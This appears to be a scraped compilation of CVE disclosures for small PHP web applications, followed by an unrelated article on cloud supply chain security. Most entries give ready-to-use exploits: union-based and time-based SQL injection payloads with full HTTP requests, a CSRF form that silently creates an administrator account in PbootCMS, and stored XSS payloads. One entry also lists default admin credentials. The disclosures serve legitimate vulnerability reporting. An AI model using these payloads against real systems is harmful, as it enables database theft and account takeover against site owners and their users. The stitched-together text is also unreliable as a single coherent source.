An issue was discovered in zzcms 2019. SQL Injection exists in dl/dl_print.php via an id parameter value with a trailing comma.

Link Url : http://www.zzcms.net/about/6.htm  
Edition : ZZCMS2018升2019 (2019-01-11)

0x01 Vulnerability (/dl/dl\_print.php line 76 ~ 80)

If index of ',' value in id parameter is bigger than 0 sql will be

When we check the query there is no single quote to id parameter. So We can inject

any query with id parameter

We can find there is no security filter for id parameter and we can inject Sql query via id parameter

if we concat ',' value at the end of id parameter

0x02 payload

give below "POC" value for post data in "/dl/dl\_print.php"

POC : union SQL injection menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page\_size%3D2&FileExt=xls&sql=select+count%28\*%29+as+total+from+zzcms\_dl+where+classid%3D1+&chkAll=checkbox&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,

CVE-2019-12351: zzcms 2019 dl/dl_print.php SQL injection · Issue #3 · cby234/zzcms

Cross Site Request Forgery (CSRF) vulnerability in PbootCMS v2.0.3 via /admin.php?p=/User/index.

<html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://pboot.com:12345/admin.php?p=/User/add" method="POST">
          <input type="hidden" name="formcheck" value="d48ee9bffae5f7fb7022ea1e7dd4a224" />
          <input type="hidden" name="username" value="TplusSs" />
          <input type="hidden" name="realname" value="asd" />
          <input type="hidden" name="password" value="123" />
          <input type="hidden" name="rpassword" value="123" />
          <input type="hidden" name="status" value="1" />
          <input type="hidden" name="roles&#91;0&#93;" value="R101" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

Then open the “/admin.php?p=/User/index” page to see the added system administrator

CVE-2020-20971: There is a CSRF vulnerability that can add the administrator account · Issue #1 · TplusSs/PbootCMS

ChatBot App with Suggestion v1.0 is vulnerable to SQL Injection via /simple_chat_bot/admin/?page=user/manage_user&id=.

**ChatBot App with Suggestion v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html

Vulnerability File: /simple\_chat\_bot/admin/?page=user/manage\_user&id=

Vulnerability location: /simple\_chat\_bot/admin/?page=user/manage\_user&id=, id

\[+\] Payload: /simple\_chat\_bot/admin/?page=user/manage\_user&id=-4%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> id

GET /simple\_chat\_bot/admin/?page\=user/manage\_user&id\=\-4%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

CVE-2022-31969: bug_report/SQLi-1.md at main · k0xx11/bug_report

EGavilan Media User-Registration-and-Login-System-With-Admin-Panel 1.0 is vulnerable to SQL Injection via profile_action - update_user. This allows a remote attacker to compromise Application SQL database.

**Hi  
I found a SQL injection vulnerability User-Registration-and-Login-System-With-Admin-Panel**

POST /User-Registration-and-Login-System-With-Admin-Panel-master/profile_action.php HTTP/1.1  
Host: 192.168.1.3  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 82  
Origin: http://192.168.1.3  
Connection: close  
Referer: http://192.168.1.3/User-Registration-and-Login-System-With-Admin-Panel-master/profile.php  
Cookie: PHPSESSID=54cet827kpno5c9g9i9grjq84h

fullname=test2'%2b(select*from(select(sleep(20)))a)%2b'&username=test1&email=test%40test.com&gender=Male&action=update_user

Above query will only sleep database for 20 second but Using SQLmap bad user can dump the database as show in image.

****

Control -  
User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended.

Remediation -  
To prevent this follow the following steps:  
a) Validate all input data against a whitelist

b) Use of parameterized queries  
String selectStatement = "SELECT \* FROM User WHERE userId = ? ";  
PreparedStatement prepStmt = con.prepareStatement(selectStatement);  
prepStmt.setString(1, userId);  
ResultSet rs = prepStmt.executeQuery();

CVE-2021-44096: Vulnerability/BUG - SQL Injection on "profile_action - update_user" · Issue #2 · EGavilan-Media/User-Registration-and-Login-System-With-Admin-Panel

EGavilan Media Contact-Form-With-Messages-Entry-Management 1.0 is vulnerable to SQL Injection via Addmessage.php. This allows a remote attacker to compromise Application SQL database.

**\# Exploit Title : SQL injection vulnerability in EGavilan Media Contact-Form-With-Messages-Entry-Management 1.0 via “Addmessage.php”.** **that allows a remote attacker to compromise Application SQL database.**

#Exploit Author : Shubham Pandey

#Vendor : EGavilan Media

#Application Link : https://egavilanmedia.com/contact-form-with-messages-entry-management-with-php-and-mysql/

#Github Link: https://github.com/EGavilan-Media/Contact-Form-With-Messages-Entry-Management

#Version: 1.0

\# CVE Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44097

**\# CVE:** CVE-2021–44097

**What is SQL injection :**

SQL injection is a type of online security flaw that allows an attacker to interfere with a web application’s database queries. It allows an attacker to see data that they wouldn’t ordinarily be able to see. This could include data belonging to other users or any other information that the app has access to. In many circumstances, an attacker can modify or remove this data, causing the application’s content or behavior to be permanently altered.

**Attack Vector:**

By exploiting the login Page parameters Using tool like SQLMAP An attacker can dump entire data from the database. The data dumped can further lead to tampering the confidentiality of the user s personal, transaction details and financial information, various session tokens of the users etc. The data obtained can also be publicly disclosed or used for competitive gains leading to financial loss to an organization.

**Vulnerable Parameter:** “firstname=”

**Steps to Reproduce:**

1.  Put = ‘%2b(select\*from(select(sleep(20)))a)%2b’ and verify SQL Database response, if response come after 20 sec that mean Application SQL database is passing given query.

> _Login page request -  
> _POST /Contact-Form-With-Messages-Entry-Management-master/process/contacts/addMessage.php HTTP/1.1  
> Host: 192.168.1.6  
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
> Accept: */*  
> Accept-Language: en-US,en;q=0.5  
> Accept-Encoding: gzip, deflate  
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
> X-Requested-With: XMLHttpRequest  
> Content-Length: 139  
> Origin: http://192.168.1.6  
> Connection: close  
> Referer: http://192.168.1.6/Contact-Form-With-Messages-Entry-Management-master/view/contact.php  
> Cookie: PHPSESSID=8jp0c36flam1krptku4bq9hvf5
> 
> firstname=test'%2b(select*from(select(sleep(20)))a)%2b'&lastname=test&email=sdsada%40gmail.com&phone=123123131&subject=test&message=rtesdas

3\. Web Server accept our Payload and by using tools like “Sqlmap” we can see that payload gets executed and Database can be compromised.

**Author:** https://www.linkedin.com/in/shubham-pandey-10704014b/

CVE-2021-44097: CVE-2021–44097 - Shubham pandey - Medium

EGavilan Media Expense-Management-System 1.0 is vulnerable to SQL Injection via /expense_action.php. This allows a remote attacker to compromise Application SQL database.

**\# Exploit Title : SQL injection vulnerability in EGavilan Media Expense-Management-System 1.0 via /expense\_action.php. that allows a remote attacker to compromise Application SQL database.**

#Exploit Author : Shubham Pandey

#Vendor : EGavilan Media

#Application Link : https://egavilanmedia.com/expense-management-system/

#Github Link: https://github.com/EGavilan-Media/Expense-Management-System

#Version: 1.0

\# CVE Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44098

**\# CVE:** CVE-2021–44098

**What is SQL injection :**

SQL injection is a type of online security flaw that allows an attacker to interfere with a web application’s database queries. It allows an attacker to see data that they wouldn’t ordinarily be able to see. This could include data belonging to other users or any other information that the app has access to. In many circumstances, an attacker can modify or remove this data, causing the application’s content or behavior to be permanently altered.

**Attack Vector:**

By exploiting the login Page parameters Using tool like SQLMAP An attacker can dump entire data from the database. The data dumped can further lead to tampering the confidentiality of the user s personal, transaction details and financial information, various session tokens of the users etc. The data obtained can also be publicly disclosed or used for competitive gains leading to financial loss to an organization.

**Vulnerable Parameter:** “description=”

**Steps to Reproduce:**

1.  Put = ‘%2b(select\*from(select(sleep(20)))a)%2b’ and verify SQL Database response, if response come after 20 sec that mean Application SQL database is passing given query.

> _Login page request -  
> _POST //Expense-Management-System-master/expense_action.php HTTP/1.1  
> Host: 192.168.1.6  
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
> Accept: application/json, text/javascript, */*; q=0.01  
> Accept-Language: en-US,en;q=0.5  
> Accept-Encoding: gzip, deflate  
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
> X-Requested-With: XMLHttpRequest  
> Content-Length: 113  
> Origin: http://192.168.1.6  
> Connection: close  
> Referer: http://192.168.1.6//Expense-Management-System-master/  
> Cookie: PHPSESSID=8jp0c36flam1krptku4bq9hvf5
> 
> description=seafood'%2b(select*from(select(sleep(20)))a)%2b'&amount=3.21&date=2019-08-02&expense_id=2&action=Edit

3\. Web Server accept our Payload and by using tools like “Sqlmap” we can see that payload gets executed and Database can be compromised.

**Author:** https://www.linkedin.com/in/shubham-pandey-10704014b/

CVE-2021-44098: CVE-2021–44098 - Shubham pandey - Medium

A SQL injection vulnerability exists in ProjectWorlds Hospital Management System in php 1.0 on login page that allows a remote attacker to compromise Application SQL database.

**Hospital Management System Mini-Project**

This **was my first short PHP project** for Web Technology subject created in October 2016.

**Features:**

1.  Front Page Slideshow
2.  Login / Logout for customer.
3.  Seperate login for admin (location/hms-admin) - username: admin, password: admin
4.  Navigation Bar
5.  Ability to Add patient detail and book appointment.
6.  CSS using Twitter Bootstrap

more project https://projectworlds.in

https://www.projectworlds.in/php-projects/hospital-management-system-in-php/

CVE-2021-44095: GitHub - projectworldsofficial/hospital-management-system-in-php: This is Hospital Management System Hospital management system is one of the best software that manages various activities in hospital 

Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=.

**Online Fire Reporting System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Vulnerability File: /ofrs/admin/?page=reports&date=

Vulnerability location: /ofrs/admin/?page=reports&date=, date

\[+\] Payload: /ofrs/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,database(),5,6,7,8,9,10--+ // Leak place ---> date

GET /ofrs/admin/?page\=reports&date\=2022\-05\-27%27%20union%20select%201,2,3,database(),5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

CVE-2022-31974: bug_report/SQLi-1.md at main · k0xx11/bug_report

Product Show Room Site version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)   #### Exploit Title: Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)#### Exploit Author: webraybtl@webray.com.cn inc#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code#### Version: Product Show Room Site 1.0#### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql#### DescriptionPersistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.#### Payload used:`<script>alert(111)</script>`#### Proof of Concept1. Login the CMS. Default Admin AccessUsername: adminPassword: admin1231. Open Page http://172.24.5.107/psrs/admin/?page=system_info/contact_info and click View button2. Put XSS payload  (`<script>alert(111)</script>`) in the Telephone box and click on Update to publish the page   ![image](https://user-images.githubusercontent.com/60683449/171591851-2068eea2-b789-464f-8afb-9f6b6f8eaedd.png)    3. Open http://172.24.5.107/psrs/?p=contact,Viewing the successfully published page,We can see the alert.   ![image](https://user-images.githubusercontent.com/60683449/171591881-2962a429-f2de-4979-8e27-6fdd8f62c61c.png)-------# Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)   #### Exploit Title: Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)#### Exploit Author: webraybtl@webray.com.cn inc#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code#### Version: Product Show Room Site 1.0#### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql#### DescriptionPersistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.#### Payload used:`<script>alert(111)</script>`#### Proof of Concept1. Login the CMS. Default Admin AccessUsername: adminPassword: admin1231. Open Page http://172.24.5.107/psrs/?p=contact 2. Put XSS payload  (`<script>alert(111)</script>`) in the Message box and click on Send Message to publish the page  ![image](https://user-images.githubusercontent.com/60683449/171591580-cc3ca01c-9e37-4e05-9351-4b9d7c7749df.png)  ![image](https://user-images.githubusercontent.com/60683449/171591599-be5e8d7f-1d95-43ad-875a-9884f7052fa6.png)   4. Open http://172.24.5.107/psrs/admin/?page=inquiries,Viewing the Top 1 of Inquiries  page,We can see the alert.  ![image](https://user-images.githubusercontent.com/60683449/171591660-c12ce9ac-aab1-45e9-b99f-7514dd28f698.png)

Product Show Room Site 1.0 Cross Site Scripting

Supply chain woes have dominated headlines, but there's another type of supply chain that's also increasingly at risk: the cloud supply chain.

Supply chain woes have dominated headlines, from raw material and labor shortages, to shipping delays and manufacturing problems. But there's another type of supply chain that's also increasingly at risk: the cloud supply chain.

Cloud supply chain risks have little to do with logistics in the literal sense of the word. Rather, they stem from vulnerabilities in cloud services and processes. Over the last 18 months, 79% of companies have experienced at least one cloud data breach, and 43% have reported 10 or more breaches in that time. And any company, in any industry, is vulnerable.

Though recent breaches have elevated awareness, cloud supply chain attacks are not going away. In fact, because cloud adoption has accelerated due to the COVID-19 pandemic, the threats may increase. So, what's at the root? Risks to the cloud supply chain primarily stem from ecosystem complexity, siloed operations, and lack of insight into software assets, all of which boil down to poor risk management.

But there's good news: gaining a clearer understanding of the supply chain as well as developing a standardized risk management protocol for the entire cloud software development life cycle can reduce the risks and challenges.

**Understanding Threats and Attack Types**

Recent studies into the supply chain have shown that at least 80% of a typical SaaS application is powered by multiple services and vendors, with each component representing a different level of risk. The complexity of this extended operating environment makes it extremely hard to manage, let alone pinpoint vulnerabilities and insecure configurations.

So, what does it look like when your cloud supply chain is under attack? Some attacks will compromise source code. In last year's PHP attack, an attacker compromised the self-hosted Git server and injected two malicious commits that were not detected by code maintainers. Organizations using the software language unknowingly downloaded the malicious code and used it in their operating environment. Dependency attacks, meanwhile, happen when attackers prey on vulnerable dependencies, also injecting them with malware.

Build pipeline threats are perhaps the most damaging types of attacks, since compromised code is turned into an executable format. During the SolarWinds attack, for example, a cybercriminal compromised the build process to insert corrupt Sunspot malware into update packages. SolarWinds did not detect the malware until much later. Though the nature of these attacks may differ, an overarching strategy can prevent them: a better understanding of what's under the hood of your cloud.

**Three Phases of Protection: Assessment, Standardization, and Partnership**

Organizations can reduce their cloud supply chain risks by developing a keen understanding of every piece of their cloud ecosystem. Yet today, just one in five organizations assesses their cloud supply chain in real time. The same number conduct weekly evaluations, and a concerning 58% evaluate their posture once a month or less frequently. This leaves the door open for bad actors.

To protect themselves, it's essential for organizations of all sizes to create a software bill of materials (SBOM), an inventory of all components in the tech stack. By doing so, companies can better understand the complexities of their environment and significantly reduce their vulnerability to cloud supply chain attack.

Once the assessment is complete and users are confident in the security of their cloud supply chains, the next step is to develop a strategy that maintains that level of security. The US National Institute of Standards and Technology's (NIST) framework for vetting cloud vendors can serve as a starting point, but companies should tailor the steps that NIST lays out to their development workflows and processes.

The right partner can also play a key role in risk management, especially for smaller businesses. While mega cloud vendors provide a solid foundation for developers to build secure products, alternative cloud providers can offer something additional: a concierge-style partnership that ensures companies aren't on their own when it comes to security.

For example, Akamai partners with the HackerOne bug bounty program, which has thousands of ethical hackers performing penetration testing against their operating environment and products. Additionally, Akamai offers security controls and protection against supply chain risk by scanning our tech stack.

**Creating a Culture of Security**

As an industry, we are currently in reaction mode. Attacks are on the rise, and organizations aren't taking enough proactive measures to prevent disaster. But as the dependency on cloud continues to grow, no company, big or small, can afford to take this gamble.

Security starts with understanding the stack, assessing the risks associated with each element, and committing to following established best practices. The software supply chain includes multiple departments — purchasing, IT, software engineering, development, release, change management, operations. It really is everyone's job to get it right.

**About the Author**

    

As senior director of information security, Joseph Zhou leads the cybersecurity program, architecture, and operations of Akamai's cloud compute operations. Zhou leads a team of security professionals spanning enterprise security architecture, network security, business continuity, security awareness training, and more. He brings a wealth of industry experience to the role, and previously served in CISO roles at Evive and Transworld Systems.

Tag

#php